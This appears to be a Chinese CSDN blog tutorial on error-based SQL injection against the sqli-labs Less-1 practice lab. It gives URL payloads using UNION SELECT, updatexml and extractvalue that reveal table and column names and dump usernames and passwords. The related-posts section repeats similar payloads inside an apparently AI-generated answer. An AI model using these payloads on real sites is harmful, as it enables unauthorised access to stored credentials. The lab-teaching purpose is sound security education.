sql注入之报错注入;这里用到的是sqli-labs/Less-1;也就是第一关,利用报错信息注入;

最新推荐文章于 2024-12-19 14:12:05 发布
原创 最新推荐文章于 2024-12-19 14:12:05 发布 · 376 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #数据库 #jvm

本文详细介绍了SQL注入的检测与利用方法,包括通过双引号判断字符型注入、ORDER BY检测字段数、联合查询获取数据库信息、利用错误报废能力探测数据等。还展示了如何通过UPDATXML和EXTRACTVALUE函数进行数据查询,以及如何规避分页限制获取数据。

1、这里简单放一个链接,记得连好数据库,配置好phpstudy环境 

sqli-labs.zip - 蓝奏云文件大小:3.5 M|https://wwu.lanzoum.com/iP8Lx09p850dsqli-labssqli-labs.zip - 蓝奏云

2、这里一切ok后

 

 

 3、浅试?id=1;不报错,有这个字段

4、双引号正常,单引号报错,说明单引号闭合成功,存在字符型注入漏洞

 

 

5、 order by 判断出字段数为3;--+将后面内容注释掉;“'”单引号将先前闭合掉;

 ?id=1' order by 3 --+

6、这里注意,插件会转义,所一这次在URL地址栏直接输入

 

 

 7、使用联合查询,查数据库,让前面的id值为假,直接执行后面语句;发现回显在第二和第三位置

8、查询简单信息

version()查询数据库版本
database()查询当前数据库  security
user()查询当前用户名

 

 

9、利用报错查询查至数据;这里php连接数据库(mysql)时,由于使用了mysql_error 函数进行报错,所以可以利用;

10、利用 联合查询第三个字段查询到表名

?id=1111' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- +

 11、后台未过滤或者使用了报错函数,这里就可以用来进行注入

extractvalue():利用报错进行注入,'~'不是xml实体,所以会报错

concat(字符串1,字符串2):用于连接两个字符串(可以称为拼接)

?id=1' and extractvalue(1,concat('~',database())) -- + 

 这里使用updatexml(,,)进行报错查询

updatexml('anything',concat('~',(sql语句)),'anything')

?id=1' and updatexml(1,concat('~',database()),1) -- +

 

 12、查询表名

?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) -- +

13、查询字段

?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) -- +

14、查询数据 

?id=1' and updatexml(1,concat('~',(select group_concat(id,username,password) from users )),1) -- +

 

 15、limit 分段显示会域group_concat一段显示冲突,这里注意

limit 0,1   -->从0个元素开始截取截取一个;只能查询一个元素

这里查询的是id;

?id=1' and updatexml(1,concat('~',(select id from users limit 1,1)),1) -- +

 

小乘杭
关注
sqli-labs靶场实现(一)【GET基于报错SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 1060
一)GET基于报错SQL注入 1SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错SQL注入 1SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 ...
SQL注入实例(sqli-labs/less-2)
Thewei666的博客
08-03 353
当没有闭合符号进行注释时,网页并没有报错,所以可以确定无闭合符号,为数值型注入
sql注入报错注入
2401_82760239的博客
04-02 2102
报错注入就是利用数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入攻击(SQL注入(SQLi)攻击)-报错注入
红目香薰
09-24 775
页面没有显示位 , 但有数据库报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式 updatexml(1,'~',3); 第二个参数包含特殊字符时,数据库报错,并将第二个参数的内容显示在报错内容中 返回结果的长度不超过32个字符 MySQL5.1及以上版本使用 本次以SQLi第一关为案例 第一步,判断注入类型 我们在参数中加入一个单引号 ' , 看其会不会报错 ?id=1' 数据库返回了一个错误 , 从错误来.
SQL报错注入
weixin_59872639的博客
02-18 1062
SQL报错注入概述 通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通 过页面面的错误提示回显出来。 报错注入的前提条件 Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上 后台未对一些具有报错功能的函数(如extractvalue、updatexml等)进行过滤 Xpath类型函数 extractvalue() 作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。 语法: extractvalue( XML_
sql报错注入
球球的博客
02-18 1000
sql报错注入,floor报错注入,extractvalue报错注入,updatexml报错注入
精选资源
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
SQL注入实例(sqli-labs/less-12)
Thewei666的博客
08-06 363
【代码】SQL注入实例(sqli-labs/less-12)
SQL注入实例(sqli-labs/less-8)
Thewei666的博客
08-05 520
确定闭合字符为单引号,并且正确页面与错误页面的显示不同。
SQL注入实例(sqli-labs/less-16)
Thewei666的博客
08-08 573
使用python脚本,查询后续的内容修改concat的范围就行。python脚本爆库名。使用python脚本。使用python脚本。
sql注入报错注入
m0_59855041的博客
06-12 1439
(4)group_concat():GROUP_CONCAT(xxx):是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
sql注入----报错注入
2402_83134109的博客
12-19 444
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。,目前对于各种不同类型数据库,不同版本数据库报错注入时可能并不能通用,常用可以通用的报错注入的方式有两种,xpath注入和主键重复导致的报错
SQL注入报错注入
欢迎光临
06-08 1748
一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,它的特点是注入速度快,但是语句较复杂,不能用group_concat(),只能用limit依次猜解0x01 利用方式报错注入只要套用公式即可,公式如下(第一个公式count(*)、floor()、rand()、group by不可或缺,后两个公式有32位的限制):?id=2’ and (select 1 f...
sqli-labs1-4,基于报错注入
weixin_30594001的博客
03-23 151
sqli1: 脚本 1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/...
sqli靶场——【Less-5】报错注入
weixin_63082823的博客
09-14 920
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
最详细的SQL注入报错注入
热门推荐
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
基于报错sql注入
qq_44111753的博客
11-21 376
MYSQL中默认有个information schema数据库,用来存储数据库信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
Sql注入-报错注入
WolvenSec的博客
06-06 2425
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sqli-labs/less1进行SQL注入时,判断其为字符型注入点,然后后续该怎么进行操作?
最新发布
07-25
<think>我们正在处理一个SQL注入漏洞利用的场景,具体是sqli-labsLess-1,且已经判断为字符型注入点(单引号闭合)。用户意图是获取数据库信息。 根据提供的引用信息,我们可以总结出以下步骤: 1. 判断注入点类型(已经完成,为字符型,使用单引号闭合) 2. 确定字段数(使用order by) 3. 确定回显位置(使用union select) 4. 获取数据库信息(如数据库名、表名、列名、数据) 具体步骤: 步骤1:判断注入点(已完成) 引用[3]中已经说明:id=1' and 1=2 order by 3 %23 (%23是#的URL编码,用于注释掉后面的内容) 步骤2:确定字段数(假设我们已经通过order by确定字段数为3) 使用order by递增直到页面返回正常和错误,从而确定字段数。例如: ?id=1' order by 3 --+ (--+是注释,也可以用%23) 当order by 4时出错,则字段数为3。 步骤3:确定回显位置 因为id=-1'可以使前面的查询不返回数据,从而让union后面的查询结果回显出来。 构造:?id=-1' union select 1,2,3 --+ 查看页面中显示的是哪个位置(比如2和3显示在页面上) 步骤4:获取数据库信息 根据引用[2]和[5],我们可以利用回显位置来获取信息。 例如: 获取当前数据库名:?id=-1' union select 1,database(),3 --+ 获取所有数据库名:?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ 获取当前数据库的所有表:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 或者直接指定数据库名(如'security'):?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取某个表(如users)的所有列:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+ 获取数据:?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+ 注意:在注入过程中,我们使用group_concat将多行数据合并成一个字符串,方便在回显位置显示。如果数据量很大,可能需要分次获取(使用limit)。 根据引用[4]还提到了写入文件的方法,但这里用户要求获取数据库信息,所以先不涉及写入。 因此,我们可以将步骤整理如下:</think>### sqli-labs Less-1 字符型注入漏洞利用步骤 **漏洞类型确认**: 已通过 `id=1' and 1=2 --+` 测试确认单引号字符型注入点(需闭合单引号)[^3]。 #### 步骤 1:确定字段数(ORDER BY) ```url http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+ ``` - 若页面正常显示,则增加数字(如 `order by 5`);若报错则回退。 - **结果**:当 `order by 4` 报错时,字段数为 **3**[^3]。 #### 步骤 2:定位回显点(UNION SELECT) ```url http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+ ``` - 页面会显示数字 **2** 和 **3**(即回显位置)[^5]。 #### 步骤 3:获取数据库信息 ##### 3.1 当前数据库名 ```url http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+ ``` - 输出示例:`security`[^2]。 ##### 3.2 获取所有表名 ```url http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ ``` - 输出示例:`emails,referers,uagents,users`[^5]。 ##### 3.3 获取目标表(users)的字段名 ```url http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+ ``` - 输出示例:`id,username,password`[^2]。 ##### 3.4 提取数据 ```url http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+ ``` - 输出示例:`admin,Dumb,...` 和 `password1,123456,...`[^5]。 #### 关键注意事项: 1. **注释符**: - `--+`(URL编码为 `--%20`)或 `%23`(#)用于注释后续语句[^3][^4]。 2. **引号处理**: - 字符串值需用单引号包裹(如 `'security'`),若遇转义需双写引号:`?id=1'))...`[^4]。 3. **信息分割**: - 大量数据时用 `limit 0,1` 分页查询(如 `limit 1,1` 获取第二行)[^2]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值